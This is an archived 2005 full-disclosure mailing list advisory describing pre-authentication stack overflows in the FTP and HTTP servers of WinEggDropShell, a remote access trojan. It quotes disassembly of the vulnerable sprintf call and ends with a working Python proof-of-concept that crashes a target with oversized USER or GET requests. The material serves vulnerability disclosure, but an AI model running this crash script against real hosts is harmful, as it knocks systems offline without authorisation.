lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <d65cd4390512012147p1de76ff7hb535519fb40ecf8f@mail.gmail.com>
Date: Fri, 2 Dec 2005 13:47:49 +0800
From: Sowhat <smaillist@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: WinEggDropShell Multiple Remote Stack Overflow


WinEggDropShell Multiple Remote Stack Overflow

by Sowhat
2005.12.02
http://secway.org/advisory/AD20051202.txt
http://secway.org/exploit/wineggdropshell_bof.py.txt

Affected:

WinEggDropShell Eterntiy version (1.7)
Other version may be vulnerable toooooo


Overview:

WinEggDropShell is a popular Chinese RAT (remote access trojan).
WineggDropShell provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server.
for more information, Goooooooooooooogle...

Multiple preauth stack overflow found in the HTTP/FTP server can be used to
execute arbitrary command or D0S (blue screen, yes, it's cool ;)


Vulnerability:


1. FTP USER bof

.text:100027BD                 push    offset aUser    ; "USER"
.text:100027C2                 call    _strlen
.text:100027C7                 add     esp, 4
.text:100027CA                 lea     edi, [ebp+eax-103h]
.text:100027D1                 push    edi
.text:100027D2                 push    offset aS       ; "%s"
.text:100027D7                 lea     edi, [ebp+var_208]
.text:100027DD                 push    edi             ; char *
.text:100027DE                 call    _sprintf        ; emmmmm, ;)


_ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is
a 0x104h buffer.

2. FTP Server Pass Command
   .............


3. HTTP GET stack overflow!
   GET /A*260


PoC:
http://secway.org/exploit/wineggdropshell_bof.py.txt


Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)

Reference:
[1] https://www.openrce.org/articles/full_view/18
[2] http://www.ccc.de/congress/2005/
[3] http://secway.org

#!/usr/bin/python
# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET"  && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11

# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo

import sys
import string
import socket

if (len(sys.argv) != 4):
	
	print "##########################################################################"
	print "#      WinEggDropShell Multipe PreAuth Remote Stack Overflow
PoC         #"
	print "#          This Poc will BOD the vulnerable target            
          #"
	print "#          Bug Discoverd and coded  by Sowhat                 
          #"
	print "#                 http://secway.org                           
          #"
	print "##########################################################################"
	print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
	print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80"
	print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21"
	sys.exit(0)

host = sys.argv[2]
port = string.atoi(sys.argv[3])

if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):

		request = "USER " + 'A'*512 + "\r"

if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):

		request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n"

exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)



---EOF-----



--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ